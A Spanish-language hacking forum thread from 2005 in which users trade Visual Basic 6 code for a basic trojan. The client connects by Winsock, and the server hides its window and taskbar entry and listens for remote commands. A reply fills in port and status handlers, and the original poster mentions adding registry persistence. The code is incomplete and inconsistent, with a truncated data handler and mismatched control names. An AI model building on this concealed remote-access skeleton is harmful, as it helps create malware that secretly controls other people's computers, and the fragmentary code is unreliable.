elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Lo basico para un troyano
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Lo basico para un troyano  (Leído 1,779 veces)
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Lo basico para un troyano
« en: 19 Agosto 2005, 01:12 am »

Bueno...pues ando algo confuso con esto de los troyanos...siempre me dan fallo...voy a postear aqui lo que realmente ace falta para que funcione un troyano

--CLIENTE--

Citar
Private Sub Command1_Click()
Winsock1.RemoteHost = Text1.Text
Winsock1.Connect
End Sub

Ir añadiendo opciones


--SERVER--

Citar
Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
Winsock1.Listen
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim abrir As String
Winsock1.GetData datos
Acciones

Eso esta bien?Se le puede poner mejor?

Alguna ayuda plis...


En línea

Chief

Desconectado Desconectado

Mensajes: 232


Ind. Arg.


Ver Perfil
Re: Lo basico para un troyano
« Respuesta #1 en: 19 Agosto 2005, 02:33 am »

Te falta establecer el puerto, podes hacer asi mas facil :

winsock.close 'para evitar errores
winsock1.connect ip, puerto

tambien te faltaria esto:

Private Sub winsock_Close()  'para que si se desconcta saberlo
lblEstado.Caption = "Desconectado"
ws.Close
End Sub

Private Sub winsock_Connect()  'para que si se conecta saberlo
lblEstado.Caption = "Conectado"
End Sub


Private Sub winsock_error(ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) 'por si hay error que cierre
ws.Close
End Sub



y bueno hay creo que esta

chau salu2!!! 



En línea

sr. oscuro

BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Re: Lo basico para un troyano
« Respuesta #2 en: 19 Agosto 2005, 02:35 am »

Es cierto...tambien para agregarlo al registro y otras cosas mas...pero solo quiero algo basico para despues ir metiendole cosas...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
HellRaiser: construye un troyano para Mac OS X
Análisis y Diseño de Malware
Charles Mayer 1 3,145 Último mensaje 12 Febrero 2011, 18:27 pm
por afdlkglfgfdgfhgf
Troyano para Mac
Análisis y Diseño de Malware
Milo_EscorpioNN 6 11,231 Último mensaje 14 Diciembre 2011, 18:01 pm
por paju1986
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines